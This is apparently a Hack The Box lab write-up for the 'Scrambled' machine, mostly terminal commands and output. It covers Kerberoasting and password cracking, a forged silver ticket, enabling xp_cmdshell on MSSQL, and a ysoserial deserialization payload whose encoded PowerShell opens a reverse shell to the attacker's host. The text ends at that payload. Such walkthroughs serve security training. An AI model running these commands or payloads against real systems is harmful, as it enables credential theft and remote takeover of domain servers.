Scrambled
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nmap 10.129.161.177 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 09:54 EDT
Nmap scan report for 10.129.161.177
Host is up (0.10s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4411/tcp open found
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49701/tcp open unknown
49710/tcp open unknown
49736/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 40.01 seconds
1.1.2. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# dirsearch -u http://10.129.161.177/ -x 403 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Scrambled/reports/http_10.129.161.177/__25-10-12_09-45-25.txt
Target: http://10.129.161.177/
[09:45:25] Starting:
[09:45:45] 301 - 152B - /assets -> http://10.129.161.177/assets/
[09:46:01] 301 - 152B - /images -> http://10.129.161.177/images/
[09:46:09] 200 - 2KB - /passwords.html
[09:46:19] 200 - 2KB - /support.html
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# curl http://10.129.161.177/passwords.html
<!DOCTYPE HTML>
<html>
<head>
<title>Password Resets</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<link rel="stylesheet" href="assets/css/main.css" />
<noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">
<!-- Wrapper -->
<div id="wrapper">
<!-- Nav -->
<nav id="nav">
<ul>
<li><a href="index.html">Home</a></li>
<li><a href="#">Reports</a></li>
<li><a href="support.html" class="active">IT Services</a></li>
</ul>
</nav>
<!-- Main -->
<div id="main">
<!-- Content -->
<section id="content" class="main">
<!-- Text -->
<section>
<h2><strong>Password Resets</strong></h2>
<p>
Our self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password.
If no one is available please leave a message stating your username and we will reset your password to be the same as the username.
</p>
<hr />
</section>
<br />
</section>
</div>
</div>
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrollex.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/browser.min.js"></script>
<script src="assets/js/breakpoints.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="assets/js/main.js"></script>
</body>
</html>
1.1.3. hosts
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'guest' -p '' --generate-hosts-file hosts
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [-] scrm.local\guest: STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat hosts
10.129.161.177 DC1.scrm.local scrm.local DC1
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat hosts >> /etc/hosts
1.1.4. krb5.conf
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'guest' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.161.177 445 DC1 [-] scrm.local\guest: STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = SCRM.LOCAL
[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
admin_server = dc1.scrm.local
default_domain = scrm.local
}
[domain_realm]
.scrm.local = SCRM.LOCAL
scrm.local = SCRM.LOCAL
1.1.5. port 80
获取到了用户名 ksimpson
登录信息
可能的凭证 ksimpson:ksimpson
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k --generate-tgt ksimpson
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.161.177 445 DC1 [+] TGT saved to: ksimpson.ccache
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the TGT: export KRB5CCNAME=ksimpson.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=ksimpson.ccache
1.2. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# bloodhound-ce-python -c All -k -no-pass -u ksimpson -d scrm.local -ns 10.129.161.177 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: scrm.local
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Testing resolved hostname connectivity dead:beef::5de5:607d:e051:d074
INFO: Trying LDAP connection to dead:beef::5de5:607d:e051:d074
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Testing resolved hostname connectivity dead:beef::5de5:607d:e051:d074
INFO: Trying LDAP connection to dead:beef::5de5:607d:e051:d074
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 62 groups
INFO: Found 6 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS01.scrm.local
INFO: Querying computer: DC1.scrm.local
INFO: Done in 00M 16S
INFO: Compressing output into 20251012101155_bloodhound.zip
没啥东西
1.3. SMB
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'ksimpson' -p 'ksimpson' -k --shares
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.161.177 445 DC1 [*] Enumerated shares
SMB 10.129.161.177 445 DC1 Share Permissions Remark
SMB 10.129.161.177 445 DC1 ----- ----------- ------
SMB 10.129.161.177 445 DC1 ADMIN$ Remote Admin
SMB 10.129.161.177 445 DC1 C$ Default share
SMB 10.129.161.177 445 DC1 HR
SMB 10.129.161.177 445 DC1 IPC$ READ Remote IPC
SMB 10.129.161.177 445 DC1 IT
SMB 10.129.161.177 445 DC1 NETLOGON READ Logon server share
>>>> SMB 10.129.161.177 445 DC1 Public READ
SMB 10.129.161.177 445 DC1 Sales
SMB 10.129.161.177 445 DC1 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# smbclient //DC1.scrm.local/Public -k --no-pass
WARNING: The option -k|--kerberos is deprecated!
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-smbclient -k -no-pass DC1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
#
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
这里用 impacket-smbclient 可以连上,但是 smbclient 连接不上,只能说impacket yyds
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-smbclient -k -no-pass DC1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 .
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 ..
-rw-rw-rw- 630106 Fri Nov 5 13:45:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
1.4. msssql
之前扫描时就发现开放了mssql服务
尝试使用 impacket-mssqlclient 登录,报错了
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local/ksimpson@DC1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[-] ERROR(DC1): Line 1: Login failed for user 'SCRM\ksimpson'.
1.4.1. GetUserSPNs
使用 impacket-GetUserSPNs 获取具有 SPN(服务主体名称)的用户帐户的密码哈希值
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-GetUserSPNs scrm.local/ksimpson -k -no-pass -dc-host dc1.scrm.local -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2025-10-12 09:40:50.336768
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2025-10-12 09:40:50.336768
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eacf9f45aeff169f5ed5199c1962de81$278329f376dd6e3a0e00e41937c7f374a88ccaa3254472655d82bb1081032c2144f0894ffdc58df7dad1d6d93291ba774695bf5dfefc036431aec9e45f552827e5221d01b0c4a45a72058694c4bc1cf6459d9a6b486fbe6cdf0bbd32f241cc029aaf1384118ccab253ef33b30222c856a902e84fa3eb56621a9998355547a0ff3e5690a74c898ffc671f84b2e0ebcf7e847503d72195e5c6c2fc3a31d624122c3e853fbee4e40e56fb49ba095a63102258984ab634ab79904ab19fbc7ed6f336e21c969a30de669d6a7ec81cb734dad4eeb78ff191b23eb4137eb330ef3e6ad8fcdc7b1b139fa15f0702565ccc9 c9023473cfb23c41a05649644bac44603878f74100e72a34b906f25decbb09bad0975701a44cfd9ede3970d4c0df71dbd93b81d642074a6212bc345eb47e156f4bdbab5ede50a94bb0d3fc7cd0fdb25115a31ee1bf27fe4eb3eaa2610997ac3802a271d61757fcd09268851ee75467e9d0c277fa2653233e691a9cf405eae189f94ae469c888ae69cd994d5b9aac32e4a87ae9a6b6330aae73211aef00411d3692c9ff63b547569ea370c7035551ad3b7e3f9f6664b8d3e8ae4677fe0492d3f837389e093ec94ae37e20928051ae5f7666042a9d65d07f6354760c3e68ce94b4534de39a57ee20f45e976820fd754e12c5c1e18e7c39c3de0431402aa8a24ff0025d1fe937db1e610745225cd7b3cabfb443f82193def54fc6c30a575a7b555bc966bcb9c4151dad6fc20cdc17a009e2fb118573da3b2118460fcf69d875a64c3da089ee35473bd3d634cf6a81f085398ec2fc98b69efd9f7d71b2549607ae942c62e761263d68e526f19f9ea0db5237947c91dfb551c8755a170b489d6a2c6087c2bcadc49ba2e6ab9aa0a4fd68011c9051ec2f01daafb1fbd9283262b3ee8f609d1dee3c1078474d48a516618760c821b3766d022a4980b0719707f492ec6e424f873d044aae96253da0ae245bac0287b87a0bcb9c6a15fcd5eca6e4fc5de6ecfd2bab2dbc670730b072bfff05d6a0e589d1ed9556961b1234f4a0895148ce7e1294620a4cef64fd372d7fe3475e6980fa97111cc4352f1357c04cf22eadd39132827c73b7ebc2128b8e64c3707728aac2581bc8ac90ae3f58154917ea46c333187557a79b4f1dc7114d9d3fd4b700bebd3a58ae81da90a9329019ea67506ec819deda13cf4d11936472bdda229ad67b3ccf3c5f7018c068cf35f1a60b8cff214630204478bde8fb89696e05cdd0e52a2f198891dd250e2dead1594a08805e4f387335907193f6c31854ad39d5a61d529e3a0338dd8711a5006f7133f4672ac3bce46d8a0b4a23979d7f22d7219e625806f070f6ab83034810db15184b885fc8fd8a3c4f0a0dee66bf83843354117e995ed3c4fe1d7923a2ddc144fd674eec1321447ea6a5ba341708f377227
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eacf9f45aeff169f5ed5199c1962de81$278329f376dd6e3a0e00e41937c7f374a88ccaa3254472655d82bb1081032c2144f0894ffdc58df7dad1d6d93291ba774695bf5dfefc036431aec9e45f552827e5221d01b0c4a45a72058694c4bc1cf6459d9a6b486fbe6cdf0bbd32f241cc029aaf1384118ccab253ef33b30222c856a902e84fa3eb56621a9998355547a0ff3e5690a74c898ffc671f84b2e0ebcf7e847503d72195e5c6c2fc3a31d624122c3e853fbee4e40e56fb49ba095a63102258984ab634ab79904ab19fbc7ed6f336e21c969a30de669d6a7ec81cb734dad4eeb78ff191b23eb4137eb330ef3e6ad8fcdc7b1b139fa15f0702565ccc9c9023473cfb23c41a05649644bac44603878f74100e72a34b906f25decbb09bad0975701a44cfd9ede3970d4c0df71dbd93b81d642074a6212bc345eb47e156f4bdbab5ede50a94bb0d3fc7cd0fdb25115a31ee1bf27fe4eb3eaa2610997ac3802a271d61757fcd09268851ee75467e9d0c277fa2653233e691a9cf405eae189f94ae469c888ae69cd994d5b9aac32e4a87ae9a6b6330aae73211aef00411d3692c9ff63b547569ea370c7035551ad3b7e3f9f6664b8d3e8ae4677fe0492d3f837389e093ec94ae37e20928051ae5f7666042a9d65d07f6354760c3e68ce94b4534de39a57ee20f45e976820fd754e12c5c1e18e7c39c3de0431402aa8a24ff0025d1fe937db1e610745225cd7b3cabfb443f82193def54fc6c30a575a7b555bc966bcb9c4151dad6fc20cdc17a009e2fb118573da3b2118460fcf69d875a64c3da089ee35473bd3d634cf6a81f085398ec2fc98b69efd9f7d71b2549607ae942c62e761263d68e526f19f9ea0db5237947c91dfb551c8755a170b489d6a2c6087c2bcadc49ba2e6ab9aa0a4fd68011c9051ec2f01daafb1fbd9283262b3ee8f609d1dee3c1078474d48a516618760c821b3766d022a4980b0719707f492ec6e424f873d044aae96253da0ae245bac0287b87a0bcb9c6a15fcd5eca6e4fc5de6ecfd2bab2dbc670730b072bfff05d6a0e589d1ed9556961b1234f4a0895148ce7e1294620a4cef64fd372d7fe3475e6980fa97111cc4352f1357c04cf22eadd39132827c73b7ebc2128b8e64c3707728aac2581bc8ac90ae3f58154917ea46c333187557a79b4f1dc7114d9d3fd4b700bebd3a58ae81da90a9329019ea67506ec819deda13cf4d11936472bdda229ad67b3ccf3c5f7018c068cf35f1a60b8cff214630204478bde8fb89696e05cdd0e52a2f198891dd250e2dead1594a08805e4f387335907193f6c31854ad39d5a61d529e3a0338dd8711a5006f7133f4672ac3bce46d8a0b4a23979d7f22d7219e625806f070f6ab83034810db15184b885fc8fd8a3c4f0a0dee66bf83843354117e995ed3c4fe1d7923a2ddc144fd674eec1321447ea6a5ba341708f377227:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$e...377227
Time.Started.....: Sun Oct 12 23:07:31 2025 (1 sec)
Time.Estimated...: Sun Oct 12 23:07:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 15380.8 kH/s (6.33ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 49c Util: 28% Core:1890MHz Mem:8000MHz Bus:8
获取到了 sqlsvc 服务账户的密码 Pegasus60
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb 10.129.161.177 -u 'sqlsvc' -p 'Pegasus60' -k --generate-tgt sqlsvc
SMB 10.129.161.177 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.161.177 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.161.177 445 DC1 [+] TGT saved to: sqlsvc.ccache
SMB 10.129.161.177 445 DC1 [+] Run the following command to use the TGT: export KRB5CCNAME=sqlsvc.ccache
但是这个账户还是无法登录mssql
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local\sqlsvc@10.129.161.177 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
1.4.2. silver ticket
需要两个东西
- 服务账号的NThash
- 域SID
#服务账户的NT哈希
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# echo -n 'Pegasus60' | iconv -f UTF-8 -t UTF-16LE | openssl md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05
#域SID
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc ldap 10.129.161.177 -u 'sqlsvc' -p 'Pegasus60' -k --get-sid
LDAP 10.129.161.177 389 DC1 [*] None (name:DC1) (domain:scrm.local) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.161.177 389 DC1 [+] scrm.local\sqlsvc:Pegasus60
LDAP 10.129.161.177 389 DC1 Domain SID S-1-5-21-2743207045-1827831105-2542523200
#银票生成
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/DC1.SCRM.LOCAL:1433 sqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/sqlsvc
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=sqlsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# impacket-mssqlclient -k -no-pass scrm.local/sqlsvc@dc1.scrm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
SQL (SCRM\administrator dbo@master)> select is_srvrolemember('sysadmin')
-
1 --管理员权限
常规操作开xp_cmdshell
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
有5个数据库
查看 ScrambleHR 数据库中的表
SQL (SCRM\administrator dbo@master)> use ScrambleHR
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ScrambleHR dbo Employees b'BASE TABLE'
ScrambleHR dbo UserImport b'BASE TABLE'
ScrambleHR dbo Timesheets b'BASE TABLE'
查看表中的内容
SQL (SCRM\administrator dbo@ScrambleHR)> select * from Employees
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
SQL (SCRM\administrator dbo@ScrambleHR)> select * from userimport
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@ScrambleHR)> select * from Timesheets
EmployeeID TimeStart TimeEnd
---------- --------- -------
发现一个凭证 MiscSvc \ ScrambledEggs9900
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -k
SMB dc1.scrm.local 445 dc1 [*] x64 (name:dc1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc1.scrm.local 445 dc1 [+] scrm.local\MiscSvc:ScrambledEggs9900
1.5. winrm
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nxc smb dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -k --generate-tgt miscsvc
SMB dc1.scrm.local 445 dc1 [*] x64 (name:dc1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc1.scrm.local 445 dc1 [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB dc1.scrm.local 445 dc1 [+] TGT saved to: miscsvc.ccache
SMB dc1.scrm.local 445 dc1 [+] Run the following command to use the TGT: export KRB5CCNAME=miscsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# export KRB5CCNAME=miscsvc.ccache
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# klist
Ticket cache: FILE:miscsvc.ccache
Default principal: MiscSvc@SCRM.LOCAL
Valid starting Expires Service principal
10/12/2025 11:56:47 10/12/2025 21:56:47 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 10/13/2025 11:56:45
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# evil-winrm -i dc1.scrm.local -r scrm.local
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\miscsvc\Documents> whoami
scrm\miscsvc
2. Root
2.1. SMB IT
miscsvc 用户还是 ITShare 组的成员,就可以访问SMB IT共享
*Evil-WinRM* PS C:\shares\IT> tree /F /A
Folder PATH listing
Volume serial number is 5805-B4B6
C:.
+---Apps
| \---Sales Order Client
| ScrambleClient.exe
| ScrambleLib.dll
|
+---Logs
\---Reports
我们把这两个文件下下来
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> dir
Directory: C:\shares\IT\apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2021 8:52 PM 86528 ScrambleClient.exe
-a---- 11/5/2021 8:52 PM 19456 ScrambleLib.dll
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> download ScrambleClient.exe
Info: Downloading C:\shares\IT\apps\Sales Order Client\ScrambleClient.exe to ScrambleClient.exe
Info: Download successful!
*Evil-WinRM* PS C:\shares\IT\apps\Sales Order Client> download ScrambleLib.dll
Info: Downloading C:\shares\IT\apps\Sales Order Client\ScrambleLib.dll to ScrambleLib.dll
Info: Download successful!
exe文件打开后就是之前网页看到的那个
先配置好server
然后配置hosts
然后尝试之前获取到的几个账号都失败了
2.2. net反编译
用 dotpeek 反编译
导出项目
然后给ai进审计
直接轻松发现三个洞
存在一个万能用户 scrmdev
轻松登录进来
2.3. .NET反序列化
首先下载 ysoserial.net
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip
生成反序列化payload
PS C:\Users\Administrator\Desktop\s\ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9\Release> .\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
